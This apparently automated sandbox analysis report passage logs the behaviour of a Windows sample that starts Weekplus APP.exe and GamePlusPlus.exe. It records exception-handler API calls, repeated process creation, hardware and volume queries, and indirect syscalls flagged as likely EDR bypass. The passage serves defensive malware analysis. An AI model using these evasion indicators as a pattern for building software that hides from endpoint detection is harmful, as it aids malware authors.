Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDAA298 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF89FDAA298
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B873450 SetUnhandledExceptionFilter,	16_2_00007FF78B873450
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B88FC38 memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF78B88FC38
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF78B88FE14 SetUnhandledExceptionFilter,	16_2_00007FF78B88FE14
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB86D18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FF8BFB86D18
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB71478 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF8BFB71478
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB6A298 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FF8BFB6A298

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtUnmapViewOfSection: Indirect: 0x2C150E5DC37
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtUnmapViewOfSection: Indirect: 0x1B59B03DC37
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtUnmapViewOfSection: Indirect: 0x115DC19DC37
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtMapViewOfSection: Indirect: 0x2C150E5D766
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtMapViewOfSection: Indirect: 0x2C150E5DCA3
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtMapViewOfSection: Indirect: 0x1B59B03DCA3
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtMapViewOfSection: Indirect: 0x1B59B03D766
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtMapViewOfSection: Indirect: 0x115DC19DCA3
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtMapViewOfSection: Indirect: 0x115DC19D766

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Program Files\Weekplus\APP.exe "C:\Program Files\Weekplus\APP.exe"	Jump to behavior
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check

Source: GamePlusPlus.exe, 00000016.00000002.3916451501.000000DAEFAFB000.00000004.00000010.00020000.00000000.sdmp, sys.key.8.dr	Binary or memory string: :]Program Manager
Source: GamePlusPlus.exe, 00000008.00000002.2914897695.0000004502FF8000.00000004.00000010.00020000.00000000.sdmp, GamePlusPlus.exe, 00000010.00000002.3326443524.000000029C5F8000.00000004.00000010.00020000.00000000.sdmp, GamePlusPlus.exe, 00000016.00000002.3916404154.000000DAEF9FC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FF8B9180460 cpuid

0_2_00007FF8B9180460

Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Program Files\Weekplus\APP.exe VolumeInformation	Jump to behavior
